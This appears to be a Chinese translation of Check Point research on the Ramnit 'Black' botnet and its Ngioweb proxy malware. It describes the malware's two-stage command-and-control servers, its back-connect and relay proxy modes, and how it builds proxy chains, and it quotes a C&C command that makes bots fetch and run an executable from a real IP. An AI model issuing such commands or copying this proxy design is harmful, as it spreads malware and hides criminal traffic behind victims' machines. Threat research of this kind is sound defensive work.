本文翻译自:https://research.checkpoint.com/ramnits-network-proxy-servers/
作者:Alexey Bukhteyev


Ramnit是目前最大的银行僵尸网络之一,最近checkpoint研究人员发现一起新的Ramnit大规模活动——Black,两个月就感染主机超过10万。其主要作用是将受害者设备变成恶意代理服务器。之后,僵尸网络就可以做很多用途了,研究人员认为这不是攻击活动的冰山一角,也意味着新的大规模攻击活动即将来临。

图2: Ramnit “black”僵尸网络地理分布

僵尸网络有很多新的特征:

  • 很多样本使用硬编码的域名而不是DGA;
  • C&C服务器不上传VNC、password stealer、FtpGrabber这样的额外模块;
  • 其他模块(FTPServer、WebInjects)嵌入在Ramnit包中;
  • Ramnit用做恶意软件Ngioweb的加载器

Ngioweb是一个多功能的代理服务器,使用自有二层加密的二进制协议进行通信。代理恶意软件支持back-connect模式、relay模式,IPv4、IPv6协议,TCP和UDP传输。恶意软件名来源于恶意软件配置中硬编码的域名ngioweb[.]su

文中主要讲述恶意软件使用构建一个多目的的代理僵尸网络。

恶意软件功能

Ngioweb使用了两阶段的C&C基础设施。STAGE-0 C&C会通知恶意软件关于STAGE-1 C&C服务器的信息。STAGE-1 C&C服务器的作用是通过加密信道来控制恶意软件。

下图是感染过程的通信序列:

图3: Ngioweb感染和早期通信

恶意软件以两种模式运行:

  • 常规的back-connect代理
  • 中继代理

Regular Back-Connect代理模式

该模式下可以以受感染主机的身份访问远程服务。为了建立STAGE-1 C&C服务器到远程主机的连接,需要执行下面的动作:

  1. Ngioweb Bot-A 连接到C&C STAGE-0服务器,并接收连接到地址为A:6666的C&C STAGE-1服务器的命令;
  2. Ngioweb Bot-A连接到地址为A:6666的C&C STAGE-1服务器,C&C STAGE-1服务器要求Bot-A通过TCP连接到x.x.x:443;
  3. Bot-A连接到x.x.x.x:443;
  4. Bot-A通知C&C STAGE-1成功连接的消息,并创建一个到A:6666 的额外的TCP会话,用于传输C&C STAGE-1服务器到x.x.x.x:443的数据。

图4:用Ngioweb proxy bot访问远程主机

相同模式可以用于访问受感染主机所在的本地网络中的内部资源:

图5: 访问受感染主机所在的本地网络的资源

中继代理模式

该模式功能强大,因为恶意软件单元可以用来构建代理链并将恶意软件的服务隐藏在僵尸主机的IP地址背后。
下面是构建Ngioweb僵尸网络使用的隐藏服务需要进行的动作:

  1. Ngioweb Bot-A连接到C&C STAGE-0服务器,并接收连接到地址为X:6666的C&C STAGE-1服务器的命令;
  2. Ngioweb Bot-A连接到地址为X:6666的C&C STAGE-1服务器(Server-X)。Server-X要求僵尸主机开启TCP服务器。Ngioweb僵尸主机报告开启的TCP服务器的IP地址和端口。
  3. 恶意软件单元在DNS中公布Bot-A的地址;
  4. 另一个恶意软件Bot-B用DNS解析Bot-A的地址;
  5. Bot-B连接到Bot-A;
  6. Bot-A 创建到Server-X的连接,并作为Server-X与Bot-B之间的中继。

图6:用Ngioweb proxy bot创建隐藏的服务

构建代理链:

  1. Ngioweb Bot-A连接到C&C STAGE-1服务器,要是僵尸主机开启TCP服务器。Ngioweb僵尸主机报告开启的TCP服务器的IP地址和端口。
  2. C&C STAGE-1报告给C&C STAGE-0 IP和relay proxy的端口。
  3. 当新的僵尸主机(Bot-B)连接到C&C STAGE-0服务器时,就接收Bot-A的地址和端口。
  4. Bot-B建立到Bot-A的TCP连接。
  5. Bot-A建立到C&C STAGE-1的新TCP连接,然后创建C&C STAGE-1与Bot-B之间的通信信道。C&C STAGE-1服务器要求Bot-B连接到x.x.x.x:443。
  6. Bot-B连接到x.x.x.x:443。
  7. Bot-B建立到Bot-A,Bot-A建立到C&C STAGE-1的新连接。连接通过Bot-A和Bot-B连接C&C STAGE-1和x.x.x.x:443。

图7: 构建代理链

僵尸的结构并不考虑STAGE-0 C&C提供的地址属于攻击者还是另一个僵尸主机。

感染

研究人员曾发现Ngioweb样本与Ramnit打包在同一个释放器二进制文件中。但Ngioweb主要通过black僵尸网络进行传播。
通过Ramnit僵尸网络感染非常的简单。每次Ramnit僵尸进入C&C服务器都回接收到一个这样的命令:

{
’command’ : ’getexec “dml://185.44.75.109:443/1/v8.exe” “msiexic.exe”’,
’cmd_id’ : 3,
’TTL’ : 3600
}
点击收藏 | 0 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖